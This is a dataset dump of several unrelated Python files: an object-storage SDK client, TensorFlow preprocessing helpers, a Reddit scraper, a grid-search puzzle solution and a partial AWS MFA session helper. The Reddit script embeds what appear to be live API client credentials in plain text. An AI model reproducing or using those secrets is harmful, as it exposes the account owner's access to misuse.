bucket_name)\n response = self._request.delete(uri, auth=self._auth)\n if (response.status_code != requests.codes.ok and\n response.status_code != requests.codes.not_found):\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Delete bucket failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def list_objects(self, bucket_name, prefix = '', delimiter = None):\n '''\n List all objects in a specified bucket with prefix. If the number of objects\n in the bucket is larger than a threshold, you would get a FDSObjectListing\n contains no FDSObjects. In this scenario, you should call\n list_next_batch_of_objects with the returned value\n :param bucket_name: The name of the bucket to whom the object is put\n :param prefix: The prefix of the object to list\n :param delimiter: The delimiter used in listing, using '/' if 'None' given\n :return: FDSObjectListing contains FDSObject list and other metadata\n '''\n if delimiter is None:\n delimiter = self._delimiter\n uri = '%s%s?prefix=%s&delimiter=%s' % \\\n (self._config.get_base_uri(), bucket_name, prefix, delimiter)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n objects_list = FDSObjectListing(json.loads(response.content.decode('utf-8')))\n return objects_list\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'List objects under bucket %s with prefix %s failed, ' \\\n 'status=%s, reason=%s%s' % \\\n (bucket_name, prefix, response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def list_trash_objects(self, prefix = '', delimiter = None):\n '''\n Compared with list_objects, it returns a list of objects in the trash.\n :param prefix: The prefix of bucket_name/object_name.\n :param delimiter: The delimiter used in listing, using '/' if 'None' given.\n :return: FDSObjectListing contains a list of objects in the trash.\n '''\n return self.list_objects(\"trash\", prefix, delimiter);\n\n def list_next_batch_of_objects(self, previous):\n '''\n List objects in a iterative manner\n :param previous: The FDSObjectListing returned by previous call or list_objects\n :return: FDSObjectListing contains FDSObject list and other metadata, 'None'\n if all objects returned by previous calls\n '''\n if not previous.is_truncated:\n return None\n bucket_name = previous.bucket_name\n prefix = previous.prefix\n delimiter = previous.delimiter\n marker = previous.next_marker\n uri = \"%s%s?prefix=%s&delimiter=%s&marker=%s\" % \\\n (self._config.get_base_uri(), bucket_name, prefix, delimiter, marker)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n objects_list = FDSObjectListing(json.loads(response.content))\n return objects_list\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'List next batch of objects under bucket %s with prefix %s ' \\\n 'and marker %s failed, status=%s, reason=%s%s' % \\\n (bucket_name, prefix, marker, response.status_code, response.content,\n headers)\n raise GalaxyFDSClientException(message)\n\n def put_object_with_uri(self, uri, data, metadata=None):\n '''\n Put the object with the uri.\n :param uri: The uri of th bucket and object\n :param data: The data to put, bytes or a file like object\n :param metadata: The metadata of the object\n :return: The result of putting action server returns\n '''\n bucket_name, object_name = utils.uri_to_bucket_and_object(uri)\n self.put_object(bucket_name, object_name, data, metadata)\n\n def put_object(self, bucket_name, object_name, data, metadata=None):\n '''\n Put the object to a specified bucket. If a object with the same name already\n existed, it will be overwritten.\n :param bucket_name: The name of the bucket to whom the object is put\n :param object_name: The name of the object to put\n :param data: The data to put, bytes or a file like object\n :param metadata: The metadata of the object\n :return: The result of putting action server returns\n '''\n uri = '%s%s/%s' % (self._config.get_upload_base_uri(), bucket_name,\n object_name)\n if metadata is None:\n metadata = FDSObjectMetadata()\n if self._config.enable_md5_calculate:\n digest = hashlib.md5()\n digest.update(data)\n metadata.add_header(Common.CONTENT_MD5,digest.hexdigest())\n\n response = self._request.put(uri, data=data, auth=self._auth,\n headers=metadata.metadata)\n if response.status_code == requests.codes.ok:\n return PutObjectResult(json.loads(response.content.decode('utf-8')))\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Put object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def post_object(self, bucket_name, data, metadata=None):\n '''\n Post the object to a specified bucket. The object name will be generated\n by the server uniquely.\n :param bucket_name: The name of the bucket to whom the object is put\n :param data: The data to put, bytes or a file like object\n :param metadata: The metadata of the object\n :return: The result of posting action server returns\n '''\n uri = '%s%s/' % (self._config.get_upload_base_uri(), bucket_name)\n if metadata is None:\n metadata = FDSObjectMetadata()\n if self._config.enable_md5_calculate:\n digest = hashlib.md5()\n digest.update(data)\n metadata.add_header(Common.CONTENT_MD5,digest.hexdigest())\n\n response = self._request.post(uri, data=data, auth=self._auth,\n headers=metadata.metadata)\n if response.status_code == requests.codes.ok:\n return PutObjectResult(json.loads(response.content))\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Post object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_object_with_uri(self, uri, position=0, size=4096):\n '''\n Get a specified object from fds uri.\n :param uri: The uri of th bucket and object\n :param position: The start index of object to get\n :param size: The maximum size of each piece when return streaming is on\n :return: The FDS object\n '''\n bucket_name, object_name = utils.uri_to_bucket_and_object(uri)\n return self.get_object(bucket_name, object_name, position, size)\n\n def get_object(self, bucket_name, object_name, position=0, size=4096):\n '''\n Get a specified object from a bucket.\n :param bucket_name: The name of the bucket from whom to get the object\n :param object_name: The name of the object to get\n :param position: The start index of object to get\n :param size: The maximum size of each piece when return streaming is on\n :return: The FDS object\n '''\n if position < 0:\n raise GalaxyFDSClientException(\"Seek position should be no less than 0\")\n uri = '%s%s/%s' % (self._config.get_download_base_uri(), bucket_name,\n object_name)\n if position > 0:\n header = {Common.RANGE : 'bytes=%d-' % position}\n response = self._request.get(uri, auth=self._auth, headers=header)\n else:\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok or \\\n response.status_code == requests.codes.partial:\n obj = FDSObject()\n obj.stream = response.iter_content(chunk_size=size)\n summary = FDSObjectSummary()\n summary.bucket_name = bucket_name\n summary.object_name = object_name\n summary.size = int(response.headers['content-length'])\n obj.summary = summary\n obj.metadata = self._parse_object_metadata_from_headers(response.headers)\n return obj\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Get object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def download_object_with_uri(self, uri, data_file, offset=0, length=-1):\n bucket_name, object_name = utils.uri_to_bucket_and_object(uri)\n self.download_object(bucket_name, object_name, data_file, offset, length)\n\n def download_object(self, bucket_name, object_name, data_file, offset=0, length=-1):\n fds_object = self.get_object(bucket_name=bucket_name,\n object_name=object_name,\n position=offset)\n length_left = length\n if length_left == -1:\n length_left = sys.maxsize\n try:\n if data_file:\n with open(data_file, \"w\") as f:\n for chunk in fds_object.stream:\n l = min(length_left, len(chunk));\n f.write(chunk[0:l].decode('utf-8'))\n length_left -= l\n if length_left <= 0:\n break\n else:\n for chunk in fds_object.stream:\n l = min(length_left, len(chunk))\n sys.stdout.write(chunk[0:l])\n length_left -= l\n if length_left <= 0:\n break\n finally:\n fds_object.stream.close()\n\n def does_object_exists(self, bucket_name, object_name):\n '''\n Check the existence of a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object to check\n :return: True if the object exists, otherwise, False\n '''\n uri = '%s%s/%s' % (self._config.get_base_uri(), bucket_name, object_name)\n response = self._request.head(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n return True\n elif response.status_code == requests.codes.not_found:\n return False\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Check object existence failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def delete_object(self, bucket_name, object_name):\n '''\n Delete specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n '''\n uri = '%s%s/%s' % (self._config.get_base_uri(), bucket_name, object_name)\n response = self._request.delete(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Delete object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def restore_object(self, bucket_name, object_name):\n '''\n Restore a specified object from trash.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n '''\n uri = '%s%s/%srestore=' % (self._config.get_base_uri(),\n bucket_name, object_name)\n response = self._request.put(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Restore object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def rename_object(self, bucket_name, src_object_name, dst_object_name):\n '''\n Rename a specified object to a new name.\n :param bucket_name: The name of the bucket\n :param src_object_name: The original name of the object\n :param dst_object_name: The target name of the object to rename to\n '''\n uri = '%s%s/%s?renameTo=%s' % (self._config.get_base_uri(),\n bucket_name, src_object_name, dst_object_name)\n response = self._request.put(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Rename object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def set_bucket_acl(self, bucket_name, acl):\n '''\n Add grant(ACL) for specified bucket.\n :param bucket_name: The name of the bucket to add grant\n :param acl: The grant(ACL) to add\n '''\n uri = '%s%s?%s' % (self._config.get_base_uri(), bucket_name,\n SubResource.ACL)\n acp = self._acl_to_acp(acl)\n response = self._request.put(uri, auth=self._auth, data=json.dumps(acp,\n default=lambda x : x.to_string()))\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Set bucket acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_bucket_acl(self, bucket_name):\n '''\n Get the ACL of a specified bucket.\n :param bucket_name: The name of the bucket to get ACL\n :return: The got access control list\n '''\n uri = '%s%s?%s' % (self._config.get_base_uri(), bucket_name,\n SubResource.ACL)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n acp = AccessControlPolicy(json.loads(response.content))\n acl = self._acp_to_acl(acp)\n return acl\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Get bucket acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def set_object_acl(self, bucket_name, object_name, acl):\n '''\n Add grant(ACL) for a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :param acl: The grant(ACL) to add\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, SubResource.ACL)\n acp = self._acl_to_acp(acl)\n response = self._request.put(uri, auth=self._auth, data=json.dumps(acp,\n default=lambda x : x.to_string()))\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Set object acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_object_acl(self, bucket_name, object_name):\n '''\n Get the ACL of a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: The got access control list\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, SubResource.ACL)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n acp = AccessControlPolicy(json.loads(response.content))\n acl = self._acp_to_acl(acp)\n return acl\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Get object acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_object_metadata(self, bucket_name, object_name):\n '''\n Get the metadata of a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: The got object metadata\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name,\n SubResource.METADATA)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n metadata = self._parse_object_metadata_from_headers(response.headers)\n return metadata\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Get object metadata failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def prefetch_object(self, bucket_name, object_name):\n '''\n Prefetch the object to CDN\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: void\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"prefetch\")\n response = self._request.put(uri, auth=self._auth, data=\"\")\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Prefetch object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def refresh_object(self, bucket_name, object_name):\n '''\n Refresh the cache of the object in CDN\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: void\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"refresh\")\n response = self._request.put(uri, auth=self._auth, data=\"\")\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Refresh object failed, status=%s, reason=%s%s' %(\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def set_public(self, bucket_name, object_name):\n acl = AccessControlList()\n grant = Grant(Grantee(UserGroups.ALL_USERS), Permission.READ)\n grant.type = GrantType.GROUP\n acl.add_grant(grant)\n self.set_object_acl(bucket_name, object_name, acl)\n\n def init_multipart_upload(self, bucket_name, object_name):\n '''\n Init a multipart upload session\n :param bucket_name:\n :param object_name:\n :return:\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"uploads\")\n response = self._request.put(uri, auth=self._auth, data=\"\")\n if response.status_code == requests.codes.ok:\n result = InitMultipartUploadResult(json.loads(response.content))\n return result\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' headers=%s' % response.headers\n message = 'Init multipart upload failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def upload_part(self, bucket_name, object_name, upload_id, part_number, data):\n '''\n Upload a multipart upload part\n :param bucket_name:\n :param object_name:\n :param upload_id:\n :param part_number:\n :param data:\n :return:\n '''\n uri = '%s%s/%s?%s%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"uploadId=\" +\n upload_id, \"&partNumber=\" + str(part_number))\n response = self._request.put(uri, auth=self._auth, data=data)\n if response.status_code == requests.codes.ok:\n result = UploadPartResult(json.loads(response.content))\n return result\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' headers=%s' % response.headers\n message = 'Upload part failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def complete_multipart_upload(self, bucket_name, object_name, upload_id,\n metadata, upload_part_result_list):\n '''\n Complete a multipart upload\n :param bucket_name:\n :param object_name:\n :param upload_id:\n :param metadata:\n :param upload_part_result_list:\n :return:\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"uploadId=\" +\n upload_id)\n if metadata is None:\n metadata = FDSObjectMetadata()\n response = self._request.put(uri, auth=self._auth,\n data=upload_part_result_list, headers=metadata.metadata)\n if response.status_code == requests.codes.ok:\n result = PutObjectResult(json.loads(response.content))\n return result\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' headers=%s' % response.headers\n message = 'Complete multipart upload failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def abort_multipart_upload(self, bucket_name, object_name, upload_id):\n '''\n Abort a multipart upload\n :param bucket_name:\n :param object_name:\n :param upload_id:\n :return:\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"uploadId=\" +\n upload_id)\n response = self._request.put(uri, auth=self._auth, data='')\n if response != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' headers=%s' % response.headers\n message = 'Abort multipart upload failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def generate_presigned_uri(self, base_uri, bucket_name, object_name,\n expiration, http_method = \"GET\", content_type = None):\n '''\n Generate a pre-signed uri to share object with the public\n :param base_uri: The base uri of rest server. Use client's default if 'None' pass\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :param expiration: The expiration time of the uri: milliseconds from the Epoch\n :param http_method: The http method used in uri\n :return: The pre-signed uri string\n '''\n if not base_uri or base_uri == '':\n if http_method == 'PUT' or http_method == 'POST':\n base_uri = self._config.get_upload_base_uri()\n elif http_method == 'DELETE':\n base_uri = self._config.get_base_uri()\n else:\n base_uri = self._config.get_download_base_uri()\n try:\n uri = '%s%s/%s?%s=%s&%s=%s&' % \\\n (base_uri, bucket_name, object_name, \\\n Common.GALAXY_ACCESS_KEY_ID, self._auth._app_key, \\\n Common.EXPIRES, str(int(expiration)))\n headers = None\n if content_type != None and isinstance(content_type, str):\n headers = {Common.CONTENT_TYPE: content_type}\n signature = self._auth._sign_to_base64(http_method, headers, uri, \\\n self._auth._app_secret).decode('utf-8')\n return '%s%s/%s?%s=%s&%s=%s&%s=%s' % \\\n (base_uri, quote(bucket_name), quote(object_name), \\\n Common.GALAXY_ACCESS_KEY_ID, self._auth._app_key, \\\n Common.EXPIRES, str(int(expiration)), Common.SIGNATURE, signature)\n except Exception as e:\n message = 'Wrong expiration given. ' \\\n 'Milliseconds since January 1, 1970 should be used. ' + str(e)\n raise GalaxyFDSClientException(message)\n\n def generate_download_object_uri(self, bucket_name, object_name):\n '''\n Generate a URI for downloading object\n '''\n return '%s%s/%s' % (self._config.get_download_base_uri(), bucket_name,\n object_name)\n\n def _acp_to_acl(self, acp):\n '''\n Translate AccessControlPolicy to AccessControlList.\n '''\n if acp is not None:\n acl = AccessControlList()\n for item in acp['accessControlList']:\n grantee = item['grantee']\n grant_id = grantee['id']\n permission = item['permission']\n g = Grant(Grantee(grant_id), permission)\n acl.add_grant(g)\n return acl\n return str()\n\n def _acl_to_acp(self, acl):\n '''\n Translate AccessControlList to AccessControlPolicy.\n '''\n if acl is not None:\n acp = AccessControlPolicy(None)\n owner = Owner()\n owner.id = self._access_key\n acp.owner = owner\n acp.access_control_list = acl.get_grant_list()\n return acp\n return ''\n\n def _parse_object_metadata_from_headers(self, response_headers):\n '''\n Parse object metadata from the response headers.\n '''\n metadata = FDSObjectMetadata()\n header_keys = [c.lower() for c in list(response_headers.keys())];\n for key in FDSObjectMetadata.PRE_DEFINED_METADATA:\n if key.lower() in header_keys:\n metadata.add_header(key, response_headers[key])\n for key in response_headers:\n if key.lower().startswith(FDSObjectMetadata.USER_DEFINED_METADATA_PREFIX):\n metadata.add_user_metadata(key, response_headers[key])\n return metadata\n","repo_name":"sh4wn/galaxy-fds-sdk-python","sub_path":"fds/galaxy_fds_client.py","file_name":"galaxy_fds_client.py","file_ext":"py","file_size_in_byte":30455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"39934013941","text":"# This file contains common functions for data processing independent of the dataset and model used.\r\n# Not all of these functions are required to be used in the project\r\nimport tensorflow as tf\r\nimport config\r\n\r\n# Loading Tensorboard Logging dir and file\r\nlog_dir = config.LOG_DIR\r\nlog_file = config.LOG_FILE\r\nmodel_name = config.MODEL_NAME\r\n\r\n# ------- THE FUNCTIONS BELOW ARE USED IN THIS PROJECT ------- #\r\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\r\n\r\ndata_augmentation_flip_rotate = tf.keras.Sequential([\r\n tf.keras.layers.experimental.preprocessing.RandomFlip(\"horizontal_and_vertical\"),\r\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2)])\r\n\r\ndata_scaling_resizing = tf.keras.Sequential([\r\n tf.keras.layers.experimental.preprocessing.Resizing(512, 512),\r\n tf.keras.layers.experimental.preprocessing.Rescaling(1. / 255)])\r\n\r\nearly_stop = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=20)\r\n\r\nmonitor_func = tf.keras.callbacks.ModelCheckpoint(model_name, monitor='val_loss',\r\n verbose=0, save_best_only=True,\r\n save_weights_only=True, mode='min')\r\n\r\n\r\n# Learning rate schedule\r\ndef scheduler(epoch, lr):\r\n if epoch % 10 == 0:\r\n lr = lr / 2\r\n return lr\r\n\r\n\r\nlr_schedule = tf.keras.callbacks.LearningRateScheduler(scheduler, verbose=0)\r\n\r\n\r\n# ------- THE FUNCTIONS BELOW WILL NoT be USED IN THIS PROJECT ------- #\r\n# ------- They Did not work with our dataset\r\n\r\n\r\n# Shuffle indexes of given dataset and labels\r\ndef shuffle_indexes(X, Y):\r\n import numpy as np\r\n indexes = np.arange(X.shape[0], dtype=int)\r\n np.random.shuffle(indexes)\r\n X_new = X[indexes]\r\n Y_new = Y[indexes]\r\n return X_new, Y_new\r\n\r\n\r\n# Splitting the given dataset (dataset_X, dataset_Y) into two portions\r\n# dataset_X is the data values and dataset_Y are the corresponding labels\r\n# (X_LG, Y_LG) will have the first {percent*100}% of the dataset and\r\n# (X_SM, Y_SM) will have the last {1 - percent}*100% of the dataset\r\ndef split_dataset(dataset_X, dataset_Y, percent):\r\n # Calculate splitting index\r\n nsplit = int(percent * dataset_X.shape[0])\r\n\r\n # split dataset into\r\n X_LG = dataset_X[:nsplit]\r\n Y_LG = dataset_Y[:nsplit]\r\n X_SM = dataset_X[nsplit:]\r\n Y_SM = dataset_Y[nsplit:]\r\n return X_LG, Y_LG, X_SM, Y_SM\r\n\r\n\r\n# Returns One Hot Encoding for given train, validate and test dataset labels or None\r\ndef one_hot_encoding(train=None, validate=None, test=None):\r\n train_oh = None\r\n validate_oh = None\r\n test_oh = None\r\n if train is not None:\r\n train_oh = tf.keras.utils.to_categorical(train)\r\n if validate is not None:\r\n validate_oh = tf.keras.utils.to_categorical(validate)\r\n if test is not None:\r\n test_oh = tf.keras.utils.to_categorical(test)\r\n return train_oh, validate_oh, test_oh\r\n\r\n\r\n# returns normalized dataset values\r\n# norm_type = 0 -> min-max; norm_type = 1 -> standardization\r\ndef normalise_data(train, val, test, norm_type=0):\r\n if norm_type == 0:\r\n X_train = train / 255\r\n X_val = val / 255\r\n X_test = test / 255\r\n else:\r\n train_mean, train_std = train.mean(), train.std()\r\n X_train = (train - train_mean) / train_std\r\n X_val = (val - train_mean) / train_std\r\n X_test = (test - train_mean) / train_std\r\n return X_train, X_val, X_test\r\n\r\n\r\n# Resize Images from TFDS Dataset\r\ndef resize_dataset(img, label):\r\n img = tf.image.resize(img, (512, 512))\r\n return img, label\r\n\r\n\r\n# Extract Images and Labels in Dataset\r\ndef feature_extraction(ds):\r\n img = []\r\n lbl = []\r\n for i in ds:\r\n img.append(i[0])\r\n lbl.append(i[1])\r\n return img, lbl\r\n\r\n\r\n# Normalizes Images in Dataset using min-max method\r\ndef dataset_normalization_min_max(img, lbl):\r\n img = img / 255\r\n return img, lbl\r\n\r\n\r\n# Normalizes Images in Dataset using Standardization method\r\ndef dataset_normalization_std(img, lbl):\r\n mean, std = img.mean(), img.std()\r\n img = (img - mean) / std\r\n return img, lbl\r\n\r\n\r\n# Augment Images in Dataset using random flip method\r\ndef dataset_augmentation_flip(img, lbl):\r\n return tf.image.random_flip_left_right(img), lbl\r\n\r\n\r\n# Augment Images in Dataset using random contrast method\r\ndef dataset_augmentation_contrast(img, lbl):\r\n return tf.image.random_contrast(img, lower=0.0, upper=1.0), lbl\r\n","repo_name":"rsbaher1/ENEL645_Project","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14377884140","text":"\n\nimport praw\nimport json\n\n# Reddit API Credentials\nclient_id = 'm94LTsIrdVY19IZENHTKqg'\nclient_secret = 'ODRb0IOHJzubnQZTKWnIomj90OG-8g'\nuser_agent = 'app:v1.0 (by /u/cagierboot)'\n\n# Setup Reddit Client\nreddit = praw.Reddit(client_id=client_id, client_secret=client_secret, user_agent=user_agent)\n\n# Subreddit to fetch data from\nsubreddit_name = \"worldnews\"\n\n# Store all posts with their top comments\nall_posts_data = []\n\ntop_posts = reddit.subreddit(subreddit_name).hot(limit=100)\nfor post in top_posts:\n # Ensure the post has been loaded correctly\n post.comment_sort = 'top'\n post.comments.replace_more(limit=0) # Load all top-level comments, replace \"more comments\" links\n top_comment = post.comments[0].body if post.comments else \"No comments available.\"\n\n post_info = {\n 'prompt': f\"{post.title}\",\n 'completion': f\"\\n{top_comment}\\n\",\n 'system_message': \"You are an AI bot that is trained on world news current events and can perform analyses on this data you are training on.\"\n}\n\n all_posts_data.append(post_info)\n\n# Writing data to a JSON file\nwith open('top_posts_with_comments.json', 'w', encoding='utf-8') as f:\n json.dump(all_posts_data, f, ensure_ascii=False, indent=4)\n\nprint(\"Top posts with their top comments have been saved to 'top_posts_with_comments.json'\")\n","repo_name":"cagierboot/zeitgeistdreams","sub_path":"trendExtract.py","file_name":"trendExtract.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20055145280","text":"T = int(input())\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\n\ndef dfs(x, y, dig):\n global answer\n\n for r in range(4):\n nx = x + dx[r]\n ny = y + dy[r]\n if 0 <= nx < N and 0 <= ny < N:\n if not visited[nx][ny]:\n if data[x][y] > data[nx][ny]:\n visited[nx][ny] = visited[x][y] + 1\n dfs(nx, ny, dig)\n visited[nx][ny] = 0\n\n elif dig:\n if data[x][y] > data[nx][ny] - K:\n temp = data[nx][ny]\n data[nx][ny] = data[x][y] - 1\n visited[nx][ny] = visited[x][y] + 1\n dfs(nx, ny, False)\n visited[nx][ny] = 0\n data[nx][ny] = temp\n\n if answer < visited[x][y]:\n answer = visited[x][y]\n\n\nfor tc in range(1, T + 1):\n N, K = map(int, input().split())\n data = [list(map(int, input().split())) for _ in range(N)]\n max_val = max(sum(data, []))\n peaks = []\n for row in range(N):\n for col in range(N):\n if data[row][col] == max_val:\n peaks.append([row, col])\n\n answer = 0\n for peak in peaks:\n x, y = peak\n visited = [[0 for _ in range(N)] for _ in range(N)]\n visited[x][y] = 1\n dfs(x, y, True)\n\n print('#{} {}'.format(tc, answer))","repo_name":"swsilver95/TIL","sub_path":"algorithm/SWEA/SWEA1949_등산로조성_Ad.py","file_name":"SWEA1949_등산로조성_Ad.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44259065815","text":"import datetime\nimport logging\nimport os\nimport sys\n\nimport boto\nimport boto.s3\nimport boto.exception\n\nfrom boto.sts import STSConnection\n\nlogger = logging.getLogger('botomfa')\nstdout_handler = logging.StreamHandler(stream=sys.stdout)\nstdout_handler.setFormatter(\n logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\nstdout_handler.setLevel(logging.DEBUG)\nlogger.addHandler(stdout_handler)\nlogger.setLevel(logging.DEBUG)\n\n\ndef get_sts(duration, mfa_serial, mfa_device_name,\n long_term, short_term, assume_role_arn=None):\n if boto.config.get(long_term, 'aws_access_key_id') is None:\n logger.error('aws_access_key_id is missing from section %s'\n 'or config file is missing.' % (long_term,))\n sys.exit(1)\n else:\n long_term_id = boto.config.get(long_term, 'aws_access_key_id')\n\n if boto.config.get(long_term, 'aws_secret_access_key') is None:\n logger.error('aws_secret_access_key is missing from section '\n 'or config file is missing.' % (long_term,))\n sys.exit(1)\n else:\n long_term_secret = boto.config.get(long_term, 'aws_secret_access_key')\n\n if boto.config.has_section(short_term):\n boto.config.remove_option(short_term, 'aws_security_token')\n\n mfa_TOTP = raw_input('Enter AWS MFA code for user %s '\n '(renewing for %s seconds):' %\n (mfa_device_name, duration))\n try:\n sts_connection = STSConnection(aws_access_key_id=long_term_id,\n aws_secret_access_key=long_term_secret)\n if assume_role_arn is None:\n tempCredentials = sts_connection.get_session_token(\n duration=duration,\n mfa_serial_number=mfa_serial,\n mfa_token=mfa_TOTP)\n assumed_role = 'False'\n else:\n role_session_name = assume_role_arn.split('/')[-1]\n assumedRole = sts_connection.assume_role(\n assume_role_arn, role_session_name,\n duration_seconds=duration,\n mfa_serial_number=mfa_serial,\n mfa_token=mfa_TOTP)\n tempCredentials = assumedRole.credentials\n assumed_role = 'True'\n\n default_options = [\n ('aws_access_key_id', tempCredentials.access_key),\n ('aws_secret_access_key', tempCredentials.secret_key),\n ('aws_security_token', tempCredentials.session_token),\n ('expiration', tempCredentials.expiration),\n ('assumed_role', assumed_role)\n ]\n\n for option, value in default_options:\n boto.config.save_user_option(\n short_term,\n option,\n value\n )\n\n except boto.exception.BotoServerError as e:\n message = '%s - Please try again.' % (e.message)\n logger.error(message)\n sys.exit(1)\n\n\ndef test_creds(profile_name):\n try:\n logger.info('Validating temporary credentials..')\n if boto.config.getbool(profile_name, 'assumed_role'):\n logger.info('You are currently using the credentials of an '\n 'AssumedRole. Use the --clear flag to clear these '\n 'credentials')\n expiration_string = boto.config.get(profile_name, 'expiration')\n if expiration_string is None:\n logger.error('Expiration timestamp missing from temporary '\n 'credentials.')\n return False\n exp_dt = datetime.datetime.strptime(\n expiration_string, '%Y-%m-%dT%H:%M:%SZ'\n )\n t_diff = exp_dt - 